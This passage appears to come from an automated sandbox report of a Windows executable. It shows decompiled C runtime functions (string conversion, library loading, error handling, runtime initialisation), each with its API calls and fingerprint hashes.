                                              				_t63 = _t21;
                                              				if((_t40 & _t20) > 0x400) {
                                              					asm("sbb eax, eax");
                                              					_t69 = E002F3696(_t63, _t48 & _t63);
                                              					if(_t69 == 0) {
                                              						goto L14;
                                              					}
                                              					 *_t69 = 0xdddd;
                                              					L9:
                                              					_t69 =  &(_t69[4]);
                                              					goto L11;
                                              				}
                                              				asm("sbb eax, eax");
                                              				E002FA3A0();
                                              				_t69 = _t71;
                                              				if(_t69 == 0) {
                                              					goto L14;
                                              				}
                                              				 *_t69 = 0xcccc;
                                              				goto L9;
                                              			}




















                                              0x002f5bb3
                                              0x002f5bba
                                              0x002f5bc6
                                              0x002f5bcb
                                              0x002f5bd0
                                              0x002f5bd5
                                              0x002f5bd8
                                              0x002f5bda
                                              0x002f5bda
                                              0x002f5bdf
                                              0x002f5bf8
                                              0x002f5bfe
                                              0x002f5c03
                                              0x002f5ca2
                                              0x002f5ca6
                                              0x002f5cab
                                              0x002f5cab
                                              0x002f5cc7
                                              0x002f5cc7
                                              0x002f5c09
                                              0x002f5c0c
                                              0x002f5c11
                                              0x002f5c15
                                              0x002f5c61
                                              0x002f5c63
                                              0x002f5c65
                                              0x002f5c6a
                                              0x002f5c81
                                              0x002f5c89
                                              0x002f5c99
                                              0x002f5c99
                                              0x002f5c89
                                              0x002f5c9b
                                              0x002f5c9c
                                              0x00000000
                                              0x002f5ca1
                                              0x002f5c17
                                              0x002f5c1c
                                              0x002f5c1e
                                              0x002f5c20
                                              0x002f5c20
                                              0x002f5c28
                                              0x002f5c45
                                              0x002f5c4f
                                              0x002f5c54
                                              0x00000000
                                              0x00000000
                                              0x002f5c56
                                              0x002f5c5c
                                              0x002f5c5c
                                              0x00000000
                                              0x002f5c5c
                                              0x002f5c2c
                                              0x002f5c30
                                              0x002f5c35
                                              0x002f5c39
                                              0x00000000
                                              0x00000000
                                              0x002f5c3b
                                              0x00000000

                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 002F5BF8
                                              • __alloca_probe_16.LIBCMT ref: 002F5C30
                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 002F5C81
                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 002F5C93
                                              • __freea.LIBCMT ref: 002F5C9C
                                                • Part of subcall function 002F3696: HeapAlloc.KERNEL32(00000000,?,00000004,?,002F381C,?,00000000,?,002F60CD,?,00000004,00000000,?,?,?,002F3361), ref: 002F36C8
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                              • String ID:
                                              • API String ID: 1857427562-0
                                              • Opcode ID: 2b551d529bdb79effc09e9558004a8b6875dbd4263f407aaec222af3efea058d
                                              • Instruction ID: b9b839e41c67eb9019fc458c797dbe0ee4b36f643feb935d798e018a001ab979
                                              • Opcode Fuzzy Hash: 2b551d529bdb79effc09e9558004a8b6875dbd4263f407aaec222af3efea058d
                                              • Instruction Fuzzy Hash: BB31E272A2061EABCF258F64DC85DBEBBA5EB40790F050139FE06D6250E735CD60CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 95%
                                              			E002F5044(signed int _a4) {
                                              				signed int _t9;
                                              				void* _t13;
                                              				signed int _t15;
                                              				WCHAR* _t22;
                                              				signed int _t24;
                                              				signed int* _t25;
                                              				void* _t27;
                                              
                                              				_t9 = _a4;
                                              				_t25 = 0x305620 + _t9 * 4;
                                              				_t24 =  *_t25;
                                              				if(_t24 == 0) {
                                              					_t22 =  *(0x2fed58 + _t9 * 4);
                                              					_t27 = LoadLibraryExW(_t22, 0, 0x800);
                                              					if(_t27 != 0) {
                                              						L8:
                                              						 *_t25 = _t27;
                                              						if( *_t25 != 0) {
                                              							FreeLibrary(_t27);
                                              						}
                                              						_t13 = _t27;
                                              						L11:
                                              						return _t13;
                                              					}
                                              					_t15 = GetLastError();
                                              					if(_t15 != 0x57) {
                                              						_t27 = 0;
                                              					} else {
                                              						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                                              						_t27 = _t15;
                                              					}
                                              					if(_t27 != 0) {
                                              						goto L8;
                                              					} else {
                                              						 *_t25 = _t15 | 0xffffffff;
                                              						_t13 = 0;
                                              						goto L11;
                                              					}
                                              				}
                                              				_t4 = _t24 + 1; // 0xbb40e64f
                                              				asm("sbb eax, eax");
                                              				return  ~_t4 & _t24;
                                              			}










                                              0x002f5049
                                              0x002f504d
                                              0x002f5054
                                              0x002f5058
                                              0x002f5066
                                              0x002f507c
                                              0x002f5080
                                              0x002f50a9
                                              0x002f50ab
                                              0x002f50af
                                              0x002f50b2
                                              0x002f50b2
                                              0x002f50b8
                                              0x002f50ba
                                              0x00000000
                                              0x002f50bb
                                              0x002f5082
                                              0x002f508b
                                              0x002f509a
                                              0x002f508d
                                              0x002f5090
                                              0x002f5096
                                              0x002f5096
                                              0x002f509e
                                              0x00000000
                                              0x002f50a0
                                              0x002f50a3
                                              0x002f50a5
                                              0x00000000
                                              0x002f50a5
                                              0x002f509e
                                              0x002f505a
                                              0x002f505f
                                              0x00000000

                                              APIs
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,002F4FEB,00000000,00000000,00000000,00000000,?,002F51E8,00000006,FlsSetValue), ref: 002F5076
                                              • GetLastError.KERNEL32(?,002F4FEB,00000000,00000000,00000000,00000000,?,002F51E8,00000006,FlsSetValue,002FF210,002FF218,00000000,00000364,?,002F3CB4), ref: 002F5082
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,002F4FEB,00000000,00000000,00000000,00000000,?,002F51E8,00000006,FlsSetValue,002FF210,002FF218,00000000), ref: 002F5090
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: LibraryLoad$ErrorLast
                                              • String ID:
                                              • API String ID: 3177248105-0
                                              • Opcode ID: 833d66b15a193f527897590db42c51858bdd78ff7dd5a149a7736da26a1fdee8
                                              • Instruction ID: 92fd3b9d13aa167ed9e78f9f316cf23fc3ce3dcedf4195c300ef6a34c55a3585
                                              • Opcode Fuzzy Hash: 833d66b15a193f527897590db42c51858bdd78ff7dd5a149a7736da26a1fdee8
                                              • Instruction Fuzzy Hash: EF01DD31621A3BABCB314E68AC48D76B758EF097F17110538FB05D3250DE60D810C6E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 72%
                                              			E002F3BE2(void* __ebx, void* __ecx, void* __edx) {
                                              				void* __edi;
                                              				void* __esi;
                                              				intOrPtr _t2;
                                              				void* _t3;
                                              				void* _t4;
                                              				intOrPtr _t9;
                                              				void* _t11;
                                              				void* _t20;
                                              				void* _t21;
                                              				void* _t23;
                                              				void* _t25;
                                              				void* _t27;
                                              				void* _t29;
                                              				void* _t31;
                                              				void* _t32;
                                              				long _t36;
                                              				long _t37;
                                              				void* _t40;
                                              
                                              				_t29 = __edx;
                                              				_t23 = __ecx;
                                              				_t20 = __ebx;
                                              				_t36 = GetLastError();
                                              				_t2 =  *0x304044; // 0xffffffff
                                              				_t42 = _t2 - 0xffffffff;
                                              				if(_t2 == 0xffffffff) {
                                              					L2:
                                              					_t3 = E002F3727(_t23, 1, 0x364);
                                              					_t31 = _t3;
                                              					_pop(_t25);
                                              					if(_t31 != 0) {
                                              						_t4 = E002F51C1(_t25, _t36, __eflags,  *0x304044, _t31);
                                              						__eflags = _t4;
                                              						if(_t4 != 0) {
                                              							E002F3A54(_t25, _t31, 0x3058fc);
                                              							E002F365C(0);
                                              							_t40 = _t40 + 0xc;
                                              							__eflags = _t31;
                                              							if(_t31 == 0) {
                                              								goto L9;
                                              							} else {
                                              								goto L8;
                                              							}
                                              						} else {
                                              							_push(_t31);
                                              							goto L4;
                                              						}
                                              					} else {
                                              						_push(_t3);
                                              						L4:
                                              						E002F365C();
                                              						_pop(_t25);
                                              						L9:
                                              						SetLastError(_t36);
                                              						E002F36E4(_t20, _t29, _t31, _t36);
                                              						asm("int3");
                                              						_push(_t20);
                                              						_push(_t36);
                                              						_push(_t31);
                                              						_t37 = GetLastError();
                                              						_t21 = 0;
                                              						_t9 =  *0x304044; // 0xffffffff
                                              						_t45 = _t9 - 0xffffffff;
                                              						if(_t9 == 0xffffffff) {
                                              							L12:
                                              							_t32 = E002F3727(_t25, 1, 0x364);
                                              							_pop(_t27);
                                              							if(_t32 != 0) {
                                              								_t11 = E002F51C1(_t27, _t37, __eflags,  *0x304044, _t32);
                                              								__eflags = _t11;
                                              								if(_t11 != 0) {
                                              									E002F3A54(_t27, _t32, 0x3058fc);
                                              									E002F365C(_t21);
                                              									__eflags = _t32;
                                              									if(_t32 != 0) {
                                              										goto L19;
                                              									} else {
                                              										goto L18;
                                              									}
                                              								} else {
                                              									_push(_t32);
                                              									goto L14;
                                              								}
                                              							} else {
                                              								_push(_t21);
                                              								L14:
                                              								E002F365C();
                                              								L18:
                                              								SetLastError(_t37);
                                              							}
                                              						} else {
                                              							_t32 = E002F516B(_t25, _t37, _t45, _t9);
                                              							if(_t32 != 0) {
                                              								L19:
                                              								SetLastError(_t37);
                                              								_t21 = _t32;
                                              							} else {
                                              								goto L12;
                                              							}
                                              						}
                                              						return _t21;
                                              					}
                                              				} else {
                                              					_t31 = E002F516B(_t23, _t36, _t42, _t2);
                                              					if(_t31 != 0) {
                                              						L8:
                                              						SetLastError(_t36);
                                              						return _t31;
                                              					} else {
                                              						goto L2;
                                              					}
                                              				}
                                              			}





















                                              0x002f3be2
                                              0x002f3be2
                                              0x002f3be2
                                              0x002f3bec
                                              0x002f3bee
                                              0x002f3bf3
                                              0x002f3bf6
                                              0x002f3c04
                                              0x002f3c0b
                                              0x002f3c10
                                              0x002f3c13
                                              0x002f3c16
                                              0x002f3c28
                                              0x002f3c2d
                                              0x002f3c2f
                                              0x002f3c3a
                                              0x002f3c41
                                              0x002f3c46
                                              0x002f3c49
                                              0x002f3c4b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002f3c31
                                              0x002f3c31
                                              0x00000000
                                              0x002f3c31
                                              0x002f3c18
                                              0x002f3c18
                                              0x002f3c19
                                              0x002f3c19
                                              0x002f3c1e
                                              0x002f3c59
                                              0x002f3c5a
                                              0x002f3c60
                                              0x002f3c65
                                              0x002f3c68
                                              0x002f3c69
                                              0x002f3c6a
                                              0x002f3c71
                                              0x002f3c73
                                              0x002f3c75
                                              0x002f3c7a
                                              0x002f3c7d
                                              0x002f3c8b
                                              0x002f3c97
                                              0x002f3c9a
                                              0x002f3c9d
                                              0x002f3caf
                                              0x002f3cb4
                                              0x002f3cb6
                                              0x002f3cc1
                                              0x002f3cc7
                                              0x002f3ccf
                                              0x002f3cd1
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002f3cb8
                                              0x002f3cb8
                                              0x00000000
                                              0x002f3cb8
                                              0x002f3c9f
                                              0x002f3c9f
                                              0x002f3ca0
                                              0x002f3ca0
                                              0x002f3cd3
                                              0x002f3cd4
                                              0x002f3cd4
                                              0x002f3c7f
                                              0x002f3c85
                                              0x002f3c89
                                              0x002f3cdc
                                              0x002f3cdd
                                              0x002f3ce3
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002f3c89
                                              0x002f3cea
                                              0x002f3cea
                                              0x002f3bf8
                                              0x002f3bfe
                                              0x002f3c02
                                              0x002f3c4d
                                              0x002f3c4e
                                              0x002f3c58
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002f3c02

                                              APIs
                                              • GetLastError.KERNEL32(?,?,002F3631,00302EE8,0000000C,002F1767), ref: 002F3BE6
                                              • SetLastError.KERNEL32(00000000), ref: 002F3C4E
                                              • SetLastError.KERNEL32(00000000), ref: 002F3C5A
                                              • _abort.LIBCMT ref: 002F3C60
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: ErrorLast$_abort
                                              • String ID:
                                              • API String ID: 88804580-0
                                              • Opcode ID: 991166d25cf3f46f78e685355dbfa6e2e9d966112505bbe977e42ee2c1d51edb
                                              • Instruction ID: fd68f21a4895db3324e63b5639dc0b848790f6fba8b2d7fa8b8003bbf98aeb51
                                              • Opcode Fuzzy Hash: 991166d25cf3f46f78e685355dbfa6e2e9d966112505bbe977e42ee2c1d51edb
                                              • Instruction Fuzzy Hash: 31F0D676120A0AA6D612B6247D09B3BE6698BC1BF4B210036F704F22A2DE61CA258964
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002F1CB6() {
                                              				void* _t4;
                                              				void* _t8;
                                              
                                              				E002F2317();
                                              				E002F22AB();
                                              				if(E002F2028() != 0) {
                                              					_t4 = E002F1FDA(_t8, __eflags);
                                              					__eflags = _t4;
                                              					if(_t4 != 0) {
                                              						return 1;
                                              					} else {
                                              						E002F2064();
                                              						goto L1;
                                              					}
                                              				} else {
                                              					L1:
                                              					return 0;
                                              				}
                                              			}





                                              0x002f1cb6
                                              0x002f1cbb
                                              0x002f1cc7
                                              0x002f1ccc
                                              0x002f1cd1
                                              0x002f1cd3
                                              0x002f1cde
                                              0x002f1cd5
                                              0x002f1cd5
                                              0x00000000
                                              0x002f1cd5
                                              0x002f1cc9
                                              0x002f1cc9
                                              0x002f1ccb
                                              0x002f1ccb

                                              APIs
                                              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 002F1CB6
                                              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 002F1CBB
                                              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 002F1CC0
                                                • Part of subcall function 002F2028: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 002F2039
                                              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 002F1CD5
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                              • String ID:
                                              • API String ID: 1761009282-0
                                              • Opcode ID: 42cfafaaf29d4f7fdf202ad325c91aa28037371ee4c1ad4e7deb3511513870bf
                                              • Instruction ID: e13ba2afff98d71b560222bd782f45c3bf61d84a0700566cab0a4c4e6d071c33
                                              • Opcode Fuzzy Hash: 42cfafaaf29d4f7fdf202ad325c91aa28037371ee4c1ad4e7deb3511513870bf
                                              • Instruction Fuzzy Hash: FEC0021907035ED46C243AB126521BDD34018733C57D125FAAB5116513CE06083F9D3B
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002F5D65(intOrPtr _a4) {
                                              				intOrPtr _v8;
                                              				intOrPtr _t25;
                                              				intOrPtr* _t26;
                                              				intOrPtr _t28;
                                              				intOrPtr* _t29;
                                              				intOrPtr* _t31;
                                              				intOrPtr* _t45;
                                              				intOrPtr* _t46;
                                              				intOrPtr* _t47;
                                              				intOrPtr* _t55;
                                              				intOrPtr* _t70;
                                              				intOrPtr _t74;
                                              
                                              				_t74 = _a4;
                                              				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                                              				if(_t25 != 0 && _t25 != 0x304648) {
                                              					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
                                              					if(_t45 != 0 &&  *_t45 == 0) {
                                              						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                                              						if(_t46 != 0 &&  *_t46 == 0) {
                                              							E002F365C(_t46);
                                              							E002F58DF( *((intOrPtr*)(_t74 + 0x88)));
                                              						}
                                              						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                                              						if(_t47 != 0 &&  *_t47 == 0) {
                                              							E002F365C(_t47);
                                              							E002F59DD( *((intOrPtr*)(_t74 + 0x88)));
                                              						}
                                              						E002F365C( *((intOrPtr*)(_t74 + 0x7c)));
                                              						E002F365C( *((intOrPtr*)(_t74 + 0x88)));
                                              					}
                                              				}
                                              				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                                              				if(_t26 != 0 &&  *_t26 == 0) {
                                              					E002F365C( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                                              					E002F365C( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                                              					E002F365C( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                                              					E002F365C( *((intOrPtr*)(_t74 + 0x8c)));
                                              				}
                                              				E002F5ED8( *((intOrPtr*)(_t74 + 0x9c)));
                                              				_t28 = 6;
                                              				_t55 = _t74 + 0xa0;
                                              				_v8 = _t28;
                                              				_t70 = _t74 + 0x28;
                                              				do {
                                              					if( *((intOrPtr*)(_t70 - 8)) != 0x304638) {
                                              						_t31 =  *_t70;
                                              						if(_t31 != 0 &&  *_t31 == 0) {
                                              							E002F365C(_t31);
                                              							E002F365C( *_t55);
                                              						}
                                              						_t28 = _v8;
                                              					}
                                              					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                                              						_t29 =  *((intOrPtr*)(_t70 - 4));
                                              						if(_t29 != 0 &&  *_t29 == 0) {
                                              							E002F365C(_t29);
                                              						}
                                              						_t28 = _v8;
                                              					}
                                              					_t55 = _t55 + 4;
                                              					_t70 = _t70 + 0x10;
                                              					_t28 = _t28 - 1;
                                              					_v8 = _t28;
                                              				} while (_t28 != 0);
                                              				return E002F365C(_t74);
                                              			}















                                              0x002f5d6d
                                              0x002f5d71
                                              0x002f5d79
                                              0x002f5d82
                                              0x002f5d87
                                              0x002f5d8e
                                              0x002f5d96
                                              0x002f5d9e
                                              0x002f5da9
                                              0x002f5daf
                                              0x002f5db0
                                              0x002f5db8
                                              0x002f5dc0
                                              0x002f5dcb
                                              0x002f5dd1
                                              0x002f5dd5
                                              0x002f5de0
                                              0x002f5de6
                                              0x002f5d87
                                              0x002f5de7
                                              0x002f5def
                                              0x002f5e02
                                              0x002f5e15
                                              0x002f5e23
                                              0x002f5e2e
                                              0x002f5e33
                                              0x002f5e3c
                                              0x002f5e44
                                              0x002f5e45
                                              0x002f5e4b
                                              0x002f5e4e
                                              0x002f5e51
                                              0x002f5e58
                                              0x002f5e5a
                                              0x002f5e5e
                                              0x002f5e66
                                              0x002f5e6d
                                              0x002f5e73
                                              0x002f5e74
                                              0x002f5e74
                                              0x002f5e7b
                                              0x002f5e7d
                                              0x002f5e82
                                              0x002f5e8a
                                              0x002f5e8f
                                              0x002f5e90
                                              0x002f5e90
                                              0x002f5e93
                                              0x002f5e96
                                              0x002f5e99
                                              0x002f5e9c
                                              0x002f5e9c
                                              0x002f5eae

                                              APIs
                                                • Part of subcall function 002F365C: HeapFree.KERNEL32(00000000,00000000,?,002F5A74,?,00000000,?,00000000,?,002F5A9B,?,00000007,?,?,002F5EFD,?), ref: 002F3672
                                                • Part of subcall function 002F365C: GetLastError.KERNEL32(?,?,002F5A74,?,00000000,?,00000000,?,002F5A9B,?,00000007,?,?,002F5EFD,?,?), ref: 002F3684
                                              • ___free_lconv_mon.LIBCMT ref: 002F5DA9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: ErrorFreeHeapLast___free_lconv_mon
                                              • String ID: 8F0$HF0
                                              • API String ID: 4068849827-2950912386
                                              • Opcode ID: 3752bdbabc9508bf07a257bc0ca522179c00157becba33b8887bb72f1882c1be
                                              • Instruction ID: c4c10656abceea773cf93d2080b577f3bf94c9bab60131a56e5109b4f2af68f0
                                              • Opcode Fuzzy Hash: 3752bdbabc9508bf07a257bc0ca522179c00157becba33b8887bb72f1882c1be
                                              • Instruction Fuzzy Hash: 01318F72510A5DAFEB60AE38D845B76F7E9AF00390F10443AE359D7651DB30EE60CB18
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 37%
                                              			E002F19D1(void* __ecx, struct _EXCEPTION_POINTERS* _a4) {
                                              
                                              				asm("repne jnz 0x5");
                                              				asm("repne ret");
                                              				asm("repne jmp 0x2e");
                                              				SetUnhandledExceptionFilter(0);
                                              				UnhandledExceptionFilter(_a4);
                                              				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                              			}



                                              0x002f19d7
                                              0x002f19da
                                              0x002f19dc
                                              0x002f19e7
                                              0x002f19f0
                                              0x002f1a09

                                              APIs
                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 002F1A15
                                              • ___raise_securityfailure.LIBCMT ref: 002F1AFC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: FeaturePresentProcessor___raise_securityfailure
                                              • String ID: pN0
                                              • API String ID: 3761405300-3818120037
                                              • Opcode ID: 1376b22b2c3dc03725c937f12aaf92870e445229900fb4f1b52e78d1e4a0790b
                                              • Instruction ID: 0d308b0168ceff8ee4c472d712f4ffead926be543852b325115c94fc1546d034
                                              • Opcode Fuzzy Hash: 1376b22b2c3dc03725c937f12aaf92870e445229900fb4f1b52e78d1e4a0790b
                                              • Instruction Fuzzy Hash: 232112F551220ADFD712DF68FA62615BBACFB48350F11412BEB088B3B0E7B45A91CB41
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 83%
                                              			E002F4B54(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
                                              				signed int _t15;
                                              				intOrPtr _t20;
                                              				void* _t24;
                                              				signed int _t25;
                                              				void* _t29;
                                              				intOrPtr _t30;
                                              				void* _t31;
                                              				void* _t36;
                                              
                                              				_t28 = __edx;
                                              				_t24 = __ecx;
                                              				_t23 = __ebx;
                                              				E002F17D0(__edx, 0x302f88, 0xc);
                                              				_t30 = 0;
                                              				 *((intOrPtr*)(_t31 - 0x1c)) = 0;
                                              				_t29 = E002F3BE2(__ebx, _t24, __edx);
                                              				_t25 =  *0x304698; // 0xfffffffe
                                              				if(( *(_t29 + 0x350) & _t25) == 0 ||  *((intOrPtr*)(_t29 + 0x4c)) == 0) {
                                              					L5:
                                              					_t15 = E002F4F49(5);
                                              					 *((intOrPtr*)(_t31 - 4)) = _t30;
                                              					_t30 =  *((intOrPtr*)(_t29 + 0x48));
                                              					 *((intOrPtr*)(_t31 - 0x1c)) = _t30;
                                              					_t36 = _t30 -  *0x304570; // 0x304350
                                              					if(_t36 != 0) {
                                              						if(_t30 != 0) {
                                              							asm("lock xadd [esi], eax");
                                              							if((_t15 | 0xffffffff) == 0 && _t30 != 0x304350) {
                                              								E002F365C(_t30);
                                              							}
                                              						}
                                              						_t20 =  *0x304570; // 0x304350
                                              						 *((intOrPtr*)(_t29 + 0x48)) = _t20;
                                              						_t30 =  *0x304570; // 0x304350
                                              						 *((intOrPtr*)(_t31 - 0x1c)) = _t30;
                                              						asm("lock inc dword [esi]");
                                              					}
                                              					 *((intOrPtr*)(_t31 - 4)) = 0xfffffffe;
                                              					E002F4BE5();
                                              					goto L3;
                                              				} else {
                                              					_t30 =  *((intOrPtr*)(_t29 + 0x48));
                                              					L3:
                                              					if(_t30 != 0) {
                                              						return E002F1816(_t28);
                                              					}
                                              					E002F36E4(_t23, _t28, _t29, _t30);
                                              					goto L5;
                                              				}
                                              			}











                                              0x002f4b54
                                              0x002f4b54
                                              0x002f4b54
                                              0x002f4b5b
                                              0x002f4b60
                                              0x002f4b62
                                              0x002f4b6a
                                              0x002f4b6c
                                              0x002f4b78
                                              0x002f4b8b
                                              0x002f4b8d
                                              0x002f4b93
                                              0x002f4b96
                                              0x002f4b99
                                              0x002f4b9c
                                              0x002f4ba2
                                              0x002f4ba6
                                              0x002f4bab
                                              0x002f4baf
                                              0x002f4bba
                                              0x002f4bbf
                                              0x002f4baf
                                              0x002f4bc0
                                              0x002f4bc5
                                              0x002f4bc8
                                              0x002f4bce
                                              0x002f4bd1
                                              0x002f4bd1
                                              0x002f4bd4
                                              0x002f4bdb
                                              0x00000000
                                              0x002f4b7f
                                              0x002f4b7f
                                              0x002f4b82
                                              0x002f4b84
                                              0x002f4bf5
                                              0x002f4bf5
                                              0x002f4b86
                                              0x00000000
                                              0x002f4b86

                                              APIs
                                                • Part of subcall function 002F3BE2: GetLastError.KERNEL32(?,?,002F3631,00302EE8,0000000C,002F1767), ref: 002F3BE6
                                                • Part of subcall function 002F3BE2: SetLastError.KERNEL32(00000000), ref: 002F3C5A
                                                • Part of subcall function 002F3BE2: _abort.LIBCMT ref: 002F3C60
                                              • _abort.LIBCMT ref: 002F4B86
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: ErrorLast_abort
                                              • String ID: PC0$PC0
                                              • API String ID: 933726692-674614334
                                              • Opcode ID: 10ae758bfebf6d1f1c51dd2b1adbc4d7cee4463b9b36fab71d7e04eaa51009be
                                              • Instruction ID: 36d1503e3a46c5763524d2eb4ae405ea23d5b722b09c6ef532d5cc1e2563faa9
                                              • Opcode Fuzzy Hash: 10ae758bfebf6d1f1c51dd2b1adbc4d7cee4463b9b36fab71d7e04eaa51009be
                                              • Instruction Fuzzy Hash: F201A975D2162A9BC722BF68D85173AF364BB047A4B150236E75463282C7B0AA728FC5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 53%
                                              			E018CFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                              				void* _t7;
                                              				intOrPtr _t9;
                                              				intOrPtr _t10;
                                              				intOrPtr* _t12;
                                              				intOrPtr* _t13;
                                              				intOrPtr _t14;
                                              				intOrPtr* _t15;
                                              
                                              				_t13 = __edx;
                                              				_push(_a4);
                                              				_t14 =  *[fs:0x18];
                                              				_t15 = _t12;
                                              				_t7 = E0187CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                              				_push(_t13);
                                              				E018C5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                              				_t9 =  *_t15;
                                              				if(_t9 == 0xffffffff) {
                                              					_t10 = 0;
                                              				} else {
